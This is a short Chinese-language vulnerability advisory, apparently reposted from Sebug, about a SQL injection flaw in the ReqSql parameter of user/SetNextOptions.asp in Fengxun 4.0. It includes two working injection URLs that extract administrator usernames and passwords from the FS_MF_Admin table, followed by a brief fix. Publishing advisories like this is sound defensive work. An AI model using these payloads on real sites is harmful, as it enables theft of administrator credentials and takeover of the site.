[网络安全]风讯4.0 user/SetNextOptions.asp sql注入漏洞
2010年1月6日星期三 | | |Vulnerable:
风讯4.0
Discription:
/user/SetNextOptions.asp中对用户数据验证不严,存在sql注入漏洞。
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
构造注入 user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin"admin_name"管理用户名数据库表 user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin"admin_pass_word"管理密码数据库表
SEBUG Solution:
SEBUG临时解决办法: 对ReqSql参数进行过滤 请参考官方补丁
我的QQ空间
redlinux kernel 如何重启apach
用ssh 连接后.登陆,执行命令如下:service httpd restart/start/s...